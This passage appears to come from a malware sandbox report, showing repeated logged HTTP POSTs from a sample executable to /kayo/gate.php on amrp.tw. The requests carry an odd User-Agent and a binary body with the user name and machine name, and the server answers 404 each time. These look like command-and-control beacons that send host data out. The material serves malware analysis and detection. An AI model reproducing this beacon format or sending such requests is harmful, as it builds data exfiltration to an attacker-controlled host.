                                            Date: Thu, 29 Apr 2021 07:19:48 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            48192.168.2.34978435.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:49.118557930 CEST6058OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:49.365712881 CEST6058OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:49.835997105 CEST6059INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:50 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            49192.168.2.34978535.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:50.337779999 CEST6059OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:50.586885929 CEST6060OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:51.062310934 CEST6060INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:51 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            5192.168.2.34973035.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:18:51.066015959 CEST1152OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:18:51.314085007 CEST1153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:18:51.785861969 CEST1153INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:18:52 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            50192.168.2.34978635.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:51.565548897 CEST6061OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:51.815906048 CEST6061OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:52.284795046 CEST6061INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:52 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            51192.168.2.34978735.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:52.973608971 CEST6062OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:53.221429110 CEST6062OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:53.686990023 CEST6063INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:54 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            52192.168.2.34978835.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:54.367481947 CEST6063OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:54.615892887 CEST6064OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:55.080667973 CEST6064INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:55 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            53192.168.2.34978935.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:56.496992111 CEST6065OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:56.742147923 CEST6065OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:57.222807884 CEST6065INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:57 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            54192.168.2.34979035.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:57.722593069 CEST6066OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:57.968847990 CEST6066OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:58.434159994 CEST6067INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:58 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            55192.168.2.34979135.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:58.937624931 CEST6067OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:59.183995008 CEST6068OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:59.738395929 CEST6068INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:00 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            56192.168.2.34979235.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:20:00.214624882 CEST6069OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:00.461215019 CEST6069OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:00.943799019 CEST6069INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:01 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            57192.168.2.34979335.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:20:01.445743084 CEST6070OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:01.691780090 CEST6071OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:02.163347960 CEST6072INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:02 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            58192.168.2.34979435.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:20:02.645327091 CEST6073OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:02.891839981 CEST6073OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:03.360308886 CEST6073INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:03 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            59192.168.2.34979535.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:20:03.844490051 CEST6074OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:04.093413115 CEST6074OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:04.563808918 CEST6075INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:04 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            6192.168.2.34973135.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:18:52.333277941 CEST1155OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:18:52.578893900 CEST1162OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:18:53.048599005 CEST1164INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:18:53 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            60192.168.2.34979635.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:20:05.062419891 CEST6075OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:05.308382034 CEST6076OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:05.782468081 CEST6076INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:06 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            61192.168.2.34979735.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:20:06.256647110 CEST6077OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:06.501842022 CEST6077OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:07.193867922 CEST6077INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:07 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            62192.168.2.34979835.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:20:07.682910919 CEST6078OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:07.932044983 CEST6078OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:08.408574104 CEST6079INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:08 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            63192.168.2.34979935.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:20:08.873402119 CEST6080OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:09.119581938 CEST6088OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:09.595613956 CEST6089INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:09 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            64192.168.2.34980135.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:20:10.078578949 CEST6089OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:10.327999115 CEST6092OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:10.799532890 CEST6099INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:11 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            65192.168.2.34980335.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:20:11.328697920 CEST6100OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
